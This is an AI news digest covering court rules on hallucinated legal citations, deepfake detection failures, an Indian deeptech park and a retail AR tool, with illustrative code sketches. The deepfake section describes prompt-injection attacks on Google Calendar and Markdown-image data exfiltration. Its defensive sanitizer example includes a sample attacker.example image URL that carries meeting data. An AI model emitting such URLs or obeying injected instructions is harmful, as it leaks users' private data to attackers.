Illinois Courts Enforce AI Policy After 518 Hallucinated Citations; OpenAI, Google Struggle with Deepfakes; IIT Madras and Lowe’s Drive AI Innovation

TL;DR

- Illinois Supreme Court Enforces AI Use Policy in Courts After 518 Documented Cases of Hallucinated Legal Citations Since 2025

- OpenAI’s GPT-5.2 and Google’s Gemini Fail to Identify 95% of AI-Generated Videos, Raising Alarm Over Deepfake Detection Capabilities

- IIT Madras Launches 10x Research Park to Incubate 100 Deeptech Startups Annually

- Lowe’s Launches Mylow AR Kitchen Design Tool, Cutting Design-to-Purchase Time by 40% and Reshaping Retail AI Adoption



⚖️ Illinois Enforces AI Rules After 518 Fake Legal Citations Exposed

Illinois courts now require verifiable, human-accountable AI use after 518 cases of hallucinated legal citations. Audit trails, compliance costs of up to $200K, and lawsuits against OpenAI signal a turning point for AI accountability in law.

The Illinois Supreme Court’s enforcement of a new AI use policy follows 518 verified cases of hallucinated legal citations since 2025, marking a pivotal shift in judicial oversight of artificial intelligence. These incidents, involving factual-sounding but entirely fabricated case law and statutes, originated from AI-assisted legal research tools used by attorneys and non-lawyers alike.

The policy mandates audit trails, source verification, and human accountability for all AI-generated legal content, aligning with the proposed Federal Rule of Evidence 707 and with frameworks such as the EU AI Act and California’s AB 2013. Non-compliance risks evidence exclusion and professional discipline.
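The policy’s technical requirements are not spelled out here, but "audit trails plus source verification" can be illustrated with a small sketch. It assumes each AI-suggested citation is checked against a trusted index (a stand-in for a lookup in an authoritative legal database) and that every check is logged with a fingerprint of the draft, a timestamp, and an accountable reviewer. All names (`AuditRecord`, `audit_citations`, `trusted_index`) and the example citations are hypothetical, and exact string matching is a deliberate simplification of real citation parsing.

```python
import hashlib
import json
from dataclasses import dataclass, asdict
from datetime import datetime, timezone


@dataclass
class AuditRecord:
    """One entry in a hypothetical citation audit trail."""
    draft_sha256: str  # fingerprint of the exact draft that was checked
    citation: str      # citation text as the AI tool produced it
    verified: bool     # True only if found in the trusted index
    reviewer: str      # human accountable for the check
    checked_at: str    # UTC timestamp in ISO 8601 format


def audit_citations(draft_text: str, citations: list[str],
                    trusted_index: set[str], reviewer: str) -> list[AuditRecord]:
    """Check each AI-suggested citation against a trusted index and record the outcome."""
    digest = hashlib.sha256(draft_text.encode("utf-8")).hexdigest()
    checked_at = datetime.now(timezone.utc).isoformat()
    return [
        AuditRecord(digest, c, c.strip() in trusted_index, reviewer, checked_at)
        for c in citations
    ]


def unverified(records: list[AuditRecord]) -> list[str]:
    """Citations that must be corrected or removed before filing."""
    return [r.citation for r in records if not r.verified]


def to_json(records: list[AuditRecord]) -> str:
    """Serialize the trail so it can be retained alongside the filing."""
    return json.dumps([asdict(r) for r in records], indent=2)


# Hypothetical usage: placeholder citations, not real cases.
records = audit_citations(
    draft_text="...brief text...",
    citations=["Example v. Sample, 1 Ill. 2d 1", "Fabricated v. Case, 999 F.4th 1"],
    trusted_index={"Example v. Sample, 1 Ill. 2d 1"},
    reviewer="attorney-of-record",
)
print(unverified(records))  # ['Fabricated v. Case, 999 F.4th 1']
```

Hashing the draft ties each verification to one specific version of the document, which is the property an audit trail needs if a filing is later challenged.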

Why Did AI Fail in Legal Practice?

Hallucinations stem from the probabilistic text generation behind tools like Perplexity AI and early versions of Harvey, which optimize for fluent output rather than factual accuracy. Despite Harvey’s $8B valuation and its acquisition of Hexus for compliance automation, auditability gaps persist, especially where AI-generated drafts and due diligence records cannot be recovered.

Legal professionals face annual compliance costs of $35,000–$200,000 to implement verifiable workflows. Meanwhile, copyright infringement lawsuits against OpenAI and Microsoft reflect accountability challenges that extend beyond the courtroom.

What Comes Next for AI in Law and Research?

By 2027, LexisNexis’ Protégé AI Workflows and expanded training in AI ethics are expected to standardize evidentiary reliability. Academic institutions, prompted by NeurIPS 2025 incidents, are adopting AI citation protocols. However, regulatory fragmentation—such as conflicts between state bans and federal executive orders—remains a risk.

The Gardner v. Nationstar case in Arizona highlights misuse by non-attorneys, underscoring the need for universal AI governance. Without enforceable standards, innovation may outpace trust.

⚠️ AI Deepfake Detection Fails: GPT-5.2 and Gemini Miss 95% of Synthetic Videos

OpenAI's GPT-5.2 and Google's Gemini failed to detect 95% of AI-generated videos. With deepfakes spreading disinformation and non-consensual content, current detection systems are falling dangerously short.

OpenAI’s GPT-5.2 and Google’s Gemini failed to identify 95% of AI-generated videos in tests conducted on Jan 14–15, 2026, including content from Sora, Veo 3.1, and GrokImagine. Although vision-language models perform well on visual question answering (84.3% accuracy), they scored 35% lower on geometric reasoning tasks, pointing to functional gaps in video analysis. Human detection is similarly weak: a Runway study found correct identification in only 57.1% of cases, dropping to 50% without AI assistance.

Why are detection systems failing?

Detection models rely on static artifacts such as watermarks and provenance metadata (SynthID, C2PA), which are routinely stripped when content is re-shared online or removed with ‘AI eraser’ apps, which have been downloaded more than 500,000 times on Google Play. These tools let synthetic content circumvent regional rules such as Korea’s AI Basic Act. Gemini’s Video Check detects 90% of its own outputs but fails on third-party AI content. Ring Verify, limited to YouTube, cannot authenticate TikTok or unwatermarked videos.

Are platform integrations increasing risk?

Yes. Google Calendar was exploited via prompt injection (CVE-2026-0612, CVE-2026-0713) to extract meeting data and generate targeted deepfakes. OpenAI’s API allowed data exfiltration through malicious Markdown image rendering—reported four times but marked 'Not applicable.' These vulnerabilities expose systemic weaknesses in AI guardrails and third-party integrations.
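The specific OpenAI report is not detailed here, but Markdown image exfiltration generally works like this: injected instructions get the model to emit an image whose URL carries sensitive data in its query string, and when the client renders the image, the browser fetches that URL and hands the data to the attacker’s server. A common mitigation is to let the client render only images from allowlisted hosts. The sketch below assumes a hypothetical `allowed_hosts` setting (lowercase hostnames) and uses a regular expression as a simplification; it is not a full Markdown parser and ignores reference-style images and raw HTML `<img>` tags.

```python
import re
from urllib.parse import urlparse

# Inline Markdown images: ![alt](url) with an optional "title".
# A simplification: reference-style images and raw HTML <img> tags are not handled.
IMAGE_PATTERN = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')


def strip_untrusted_images(markdown: str, allowed_hosts: set[str]) -> str:
    """Replace images whose host is not allowlisted so the client never fetches them."""
    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""  # relative or malformed URLs get ""
        if host in allowed_hosts:
            return match.group(0)  # keep trusted images unchanged
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return IMAGE_PATTERN.sub(replace, markdown)


# Hypothetical model output carrying data in an attacker-controlled image URL.
model_output = "Summary ready. ![status](https://attacker.example/log?d=meeting-notes)"
print(strip_untrusted_images(model_output, {"cdn.example.com"}))
# Summary ready. [image removed: status]
```

Sanitizing on the rendering side matters because the model itself cannot be trusted to refuse injected instructions; an allowlist fails closed even when the prompt injection succeeds.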

What are the real-world consequences?

Undetected deepfakes have fueled disinformation during the Iran protests, with fake protest footage drawing 3.5M views, and deepfake tools have generated non-consensual images at a rate of 6,700 per hour. Animoto’s 2025 survey found that 78% of respondents distrust AI videos, undermining brand credibility. YouTube’s AI-generated Shorts, which earn $117M annually from 63B views, could amplify undetected content if detection lags.

What solutions are emerging?

Regulatory actions include the EU AI Act, UK Online Safety Act expansions, and the U.S. NO FAKES Act. Technically, forensic watermarking and detection R&D are accelerating. However, enforcement gaps and adversarial innovation—such as watermark-removal tools—continue to outpace safeguards.

🔬 IIT Madras 10x Research Park Launches to Scale 100 Deeptech Startups Yearly

IIT Madras activates 10x Research Park to incubate 100+ deeptech startups annually, backed by AI infrastructure, global ties with Google & Anthropic, and India-Japan rare earth partnerships.

IIT Madras has activated the 10x Research Park to incubate over 100 deeptech startups each year, targeting AI/ML, semiconductors, and space-tech. The park leverages AI compute clusters using multi-die architectures to bypass global memory shortages, supported by India-Japan rare earth partnerships for semiconductor supply chain resilience.

How Does the Park Integrate With India’s Broader Startup Ecosystem?

The initiative connects with more than 200,000 DPIIT-recognized startups and targets 30% of its participants from Tier-II/III cities. This aligns with national growth trends, in which regional innovation hubs are expanding beyond Bengaluru and Hyderabad.

What Role Do Global Tech Players Have in This Initiative?

Google’s Market Access Programme will onboard 50+ park startups by 2026. Anthropic is expanding its Bengaluru operations and plans a dedicated R&D wing within the park, enabling cross-border knowledge transfer and commercial scaling.

How Are AI Development Tools Accelerating Startup Output?

Startups are deploying AI coding tools like GitHub Copilot and Claude Code, which increase developer productivity by up to 40%. These tools reduce R&D cycle times, particularly in LLM and neural network development.

What Are the Predicted Outcomes for 2026?

By Q2 2026, 15–20 startups from non-metro regions are expected to join the park. India-Japan joint ventures in rare earth processing are expected by Q3. The Indian government is likely to announce new semiconductor fabrication incentives, while mandatory upskilling programs aim to counter AI-driven deskilling risks.

Is This Enough to Establish Tamil Nadu as a Global Deeptech Hub?

The park institutionalizes India’s sovereign AI and semiconductor ambitions. Success depends on sustained policy support, execution of global partnerships, and measurable output from incubated startups. Monitoring onboarding rates, JV progress, and R&D efficiency will be critical indicators.

🛠️ Lowe’s Mylow AR Cuts Kitchen Design Time by 40%: A New Era for Retail AI

Lowe’s Mylow AR slashes kitchen design-to-purchase time by 40% using AI and augmented reality. A blueprint for the future of retail? How it works, why kitchens matter, and what comes next.

Lowe’s Mylow AR tool reduces design-to-purchase time by streamlining visualization and decision-making. By overlaying photorealistic kitchen layouts in real time, users can test configurations, finishes, and appliances without physical mockups. This 40% efficiency gain aligns with AI-driven productivity trends seen in tools like GitHub Copilot, where automation accelerates high-value workflows.

Why focus on kitchens for AI and AR integration?

Kitchens are among the most frequently used spaces in the home, driving demand for functional, aesthetic designs. Mylow AR targets this high-impact area, allowing users to simulate traffic flow, storage use, and lighting. This precision addresses a core consumer pain point: confidence in long-term design choices.

What role does AI play in Mylow AR’s performance?

Beyond AR rendering, AI recommends optimal layouts based on room dimensions, user preferences, and code compliance. The system uses deep learning models trained on thousands of kitchen designs to make suggestions that are both practical and personalized. This mirrors enterprise AI adoption in software and document automation, where context-aware models boost output quality.

How does Mylow AR address AI reliability risks?

Given known issues with AI inaccuracies—such as chatbots generating flawed advice—Mylow AR incorporates validation layers. Design outputs are cross-checked against building standards, and complex projects can be routed to human specialists. This hybrid approach balances automation with oversight, preserving trust.
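How Mylow AR’s validation layer actually works is not described, so the following is only a sketch of the general "validate, then route to a human" pattern. As a stand-in for building standards it uses the widely cited NKBA work-triangle guideline (each leg between sink, cooktop, and refrigerator of 4 to 9 feet, with a total of no more than 26 feet), which is a design guideline rather than a building code. The `Point` type, `route_design` function, and routing labels are hypothetical.

```python
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Point:
    """Hypothetical appliance position on a floor plan, in feet."""
    x_ft: float
    y_ft: float


def distance(a: Point, b: Point) -> float:
    return math.hypot(a.x_ft - b.x_ft, a.y_ft - b.y_ft)


def check_work_triangle(sink: Point, stove: Point, fridge: Point) -> list[str]:
    """Return guideline violations; an empty list means the layout passes."""
    legs = [distance(sink, stove), distance(stove, fridge), distance(fridge, sink)]
    issues = [f"leg of {leg:.1f} ft is outside the 4-9 ft range"
              for leg in legs if not 4 <= leg <= 9]
    total = sum(legs)
    if total > 26:
        issues.append(f"triangle total of {total:.1f} ft exceeds 26 ft")
    return issues


def route_design(sink: Point, stove: Point, fridge: Point,
                 complex_project: bool = False) -> tuple[str, list[str]]:
    """Auto-approve clean layouts; send violations or complex jobs to a specialist."""
    issues = check_work_triangle(sink, stove, fridge)
    if issues or complex_project:
        return "human_review", issues
    return "auto_approve", issues


print(route_design(Point(0, 0), Point(6, 0), Point(0, 5)))
# ('auto_approve', [])
```

Keeping the rule check deterministic and separate from the recommendation model means a flawed AI suggestion can be caught by plain geometry before it reaches the customer.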

What’s next for retail AI after Mylow AR?

Lowe’s move signals a shift toward immersive, AI-augmented shopping. Future iterations may integrate voice controls via models like Gemini or sync with Matter-compatible smart home systems. To scale, Lowe’s must ensure cross-platform support, particularly for emerging AR hardware like Meta’s Ray-Ban smart glasses and anticipated Apple wearables.

Could Mylow AR set a new standard for retail?

Potentially. If adoption grows, competitors are likely to follow, accelerating AI standardization in retail design workflows. Success depends on avoiding hardware fragmentation and maintaining design accuracy. The tool also increases demand for AR developers, AI ethicists, and UX specialists, roles critical to refining next-gen consumer AI.
